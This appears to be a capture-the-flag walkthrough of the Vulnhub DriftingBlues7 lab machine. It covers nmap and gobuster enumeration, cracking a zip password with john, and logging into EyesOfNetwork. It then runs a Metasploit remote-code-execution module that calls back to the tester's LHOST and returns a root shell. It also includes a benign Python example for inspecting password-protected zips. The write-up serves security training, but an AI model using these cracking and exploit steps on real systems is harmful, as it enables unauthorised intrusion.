Target Machine Penetration Practice: Vulnhub Driftingblues7

Host discovery

No host discovery is needed; the target IP is 222.24.6.94.

Information gathering

nmap -sV -A -p- -T4 222.24.6.94

Output as follows:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 17:34 CST
Nmap scan report for 222.24.6.94
Host is up (0.000029s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)
| 256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)
|_ 256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)
66/tcp open http SimpleHTTPServer 0.6 (Python 2.7.5)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.5
|_http-title: Scalable Cost Effective Cloud Storage for Developers
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
|_http-title: Did not follow redirect to https://222.24.6.94/
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
| http-title: EyesOfNetwork
|_Requested resource was /login.php##
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-04-03T14:37:22
|_Not valid after: 2022-04-03T14:37:22
|_ssl-date: TLS randomness does not represent time
2403/tcp open taskmaster2000?
3306/tcp open mysql MariaDB (unauthorized)
8086/tcp open http InfluxDB http admin 1.7.9
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds

HTTP

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://222.24.6.94:66/ 

Output:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://222.24.6.94:66/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index_files (Status: 301) [Size: 0] [--> /index_files/]
/eon (Status: 200) [Size: 248]
Progress: 123910 / 220561 (56.18%)[ERROR] Get "http://222.24.6.94:66/93867": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 135096 / 220561 (61.25%)[ERROR] Get "http://222.24.6.94:66/176082": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 143778 / 220561 (65.19%)[ERROR] Get "http://222.24.6.94:66/prack": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/jari": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 143780 / 220561 (65.19%)[ERROR] Get "http://222.24.6.94:66/pimpfish": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 152016 / 220561 (68.92%)[ERROR] Get "http://222.24.6.94:66/WIN": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 158311 / 220561 (71.78%)[ERROR] Get "http://222.24.6.94:66/stage1-hppa2": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207020 / 220561 (93.86%)[ERROR] Get "http://222.24.6.94:66/business_transformation": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207021 / 220561 (93.86%)[ERROR] Get "http://222.24.6.94:66/bt_down": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/OldSkool": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/30735": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207024 / 220561 (93.86%)[ERROR] Get "http://222.24.6.94:66/20061129141118antivirus-gratuits": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/vulnerabilites": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/warner_music": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/general_biometrics": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14199": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14186": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207030 / 220561 (93.87%)[ERROR] Get "http://222.24.6.94:66/14203": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207031 / 220561 (93.87%)[ERROR] Get "http://222.24.6.94:66/14204": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/20957": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14240": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207034 / 220561 (93.87%)[ERROR] Get "http://222.24.6.94:66/14288": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14253": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/invio": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14320": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/unlimited_screen": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/itunderground": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215326 / 220561 (97.63%)[ERROR] Get "http://222.24.6.94:66/Null": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

The scan turned up two useful routes; I don't know why the target is still this slow when it is running locally.

Visiting the /eon route downloads a Base64 blob. Decoding it yields a zip archive, whose password is then brute-forced:

cat ./eon | base64 -d > asdf.zip                      # decode the downloaded blob into a zip
zip2john asdf.zip > hash                              # extract the archive's password hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash # john recovers the password: killah
unzip -P killah ./asdf.zip                            # -P (uppercase) supplies the password; -p would only pipe to stdout
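The /eon step above (a Base64 blob that decodes to a password-protected zip) is easy to triage before reaching for a cracker. The Python below is an added example and is not part of the original write-up: it decodes a Base64 blob, verifies the ZIP local-header magic, reports which members carry the encryption flag (bit 0 of the general-purpose flags, the same bit zip2john keys on), and reads a member once the password is known, which is what the unzip -P step does. Everything in it is constructed: the sample archive, its member name, contents and password are invented, and the small ZIP writer plus the ZipCrypto routine exist only so the sample can be built and verified offline with the standard zipfile module.

```python
import base64
import binascii
import io
import struct
import zipfile
import zlib
from typing import List, Optional, Tuple

# CRC-32 lookup table (polynomial 0xEDB88320). The traditional PKWARE
# ("ZipCrypto") key schedule uses it; Python's zipfile uses the same table
# when decrypting, so archives built here can be read back with zipfile.
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _zipcrypto_encrypt(password: bytes, plaintext: bytes, check_byte: int) -> bytes:
    """Traditional PKWARE encryption: a 12-byte header followed by the data."""
    keys = [0x12345678, 0x23456789, 0x34567890]

    def update(byte: int) -> None:
        keys[0] = _CRC_TABLE[(keys[0] ^ byte) & 0xFF] ^ (keys[0] >> 8)
        keys[1] = (keys[1] + (keys[0] & 0xFF)) & 0xFFFFFFFF
        keys[1] = (keys[1] * 134775813 + 1) & 0xFFFFFFFF
        keys[2] = _CRC_TABLE[(keys[2] ^ (keys[1] >> 24)) & 0xFF] ^ (keys[2] >> 8)

    def stream_byte() -> int:
        t = (keys[2] | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    for b in password:
        update(b)
    out = bytearray()
    # 11 filler bytes (random in real archives) plus the CRC high byte, which
    # lets a decryptor reject a wrong password before touching the data.
    for p in bytes(11) + bytes([check_byte]) + plaintext:
        out.append(p ^ stream_byte())
        update(p)
    return bytes(out)


def build_stored_zip(members: List[Tuple[str, bytes]], password: Optional[bytes] = None) -> bytes:
    """Write a minimal ZIP (stored members, no compression); with a password the
    members are ZipCrypto-protected. Only used to construct the sample below."""
    flags = 0x0001 if password else 0x0000
    body, central = bytearray(), bytearray()
    for name, data in members:
        name_b = name.encode("ascii")
        crc = zlib.crc32(data) & 0xFFFFFFFF
        payload = _zipcrypto_encrypt(password, data, crc >> 24) if password else data
        offset = len(body)
        body += struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, 0, 0, 0x21,
                            crc, len(payload), len(data), len(name_b), 0) + name_b + payload
        central += struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, 0, 0,
                               0x21, crc, len(payload), len(data), len(name_b),
                               0, 0, 0, 0, 0, offset) + name_b
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, len(members), len(members),
                       len(central), len(body), 0)
    return bytes(body + central + eocd)


def inspect_base64_archive(b64_text: str) -> dict:
    """Decode a Base64 blob and report whether it is a ZIP and which members
    carry the encryption flag (bit 0 of the general-purpose flags)."""
    try:
        raw = base64.b64decode("".join(b64_text.split()), validate=True)
    except (binascii.Error, ValueError):
        return {"is_zip": False, "error": "not valid base64"}
    if not raw.startswith(b"PK\x03\x04"):
        return {"is_zip": False, "error": "decoded data lacks the ZIP local-header magic"}
    try:
        with zipfile.ZipFile(io.BytesIO(raw)) as zf:
            entries = [{"name": zi.filename, "size": zi.file_size,
                        "encrypted": bool(zi.flag_bits & 0x1)} for zi in zf.infolist()]
    except zipfile.BadZipFile as exc:
        return {"is_zip": False, "error": f"malformed ZIP: {exc}"}
    return {"is_zip": True, "raw": raw, "entries": entries}


def read_member(raw_zip: bytes, name: str, password: Optional[bytes] = None) -> bytes:
    """Read one member; zipfile raises RuntimeError when the password is missing
    or wrong, and BadZipFile if the CRC does not match after decryption."""
    with zipfile.ZipFile(io.BytesIO(raw_zip)) as zf:
        return zf.read(name, pwd=password)


# Constructed sample standing in for the /eon download on the page: a one-member
# ZIP protected with a made-up password, then Base64-encoded. Nothing here is real.
SAMPLE_PASSWORD = b"example-password"
SAMPLE_CONTENT = b"constructed sample content\n"
SAMPLE_ZIP = build_stored_zip([("note.txt", SAMPLE_CONTENT)], password=SAMPLE_PASSWORD)
SAMPLE_B64 = base64.b64encode(SAMPLE_ZIP).decode("ascii")

if __name__ == "__main__":
    report = inspect_base64_archive(SAMPLE_B64)
    for entry in report["entries"]:
        print(entry["name"], entry["size"], "encrypted" if entry["encrypted"] else "plain")
    print(read_member(report["raw"], "note.txt", SAMPLE_PASSWORD).decode())
```

The encryption flag lives in the central directory, so an archive can be classified as password-protected without decrypting anything; the 12-byte ZipCrypto header ends in the CRC high byte, which is why a wrong password is rejected immediately rather than producing garbage. Note that ZipCrypto is the legacy scheme only; an archive using AES (WinZip extension) still sets bit 0 but zipfile cannot open it.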

Using the decrypted credentials on the admin back end, the login succeeds.

The version shown is EyesOfNetwork 5.3.

MSF + privilege escalation

search eyesofnetwork
use exploit/linux/http/eyesofnetwork_autodiscovery_rce
show options
set rhosts 222.24.6.94
set lhost 222.24.6.149
exploit
shell

No privilege escalation is needed; the shell is root straight away.

cat /root/flag.txt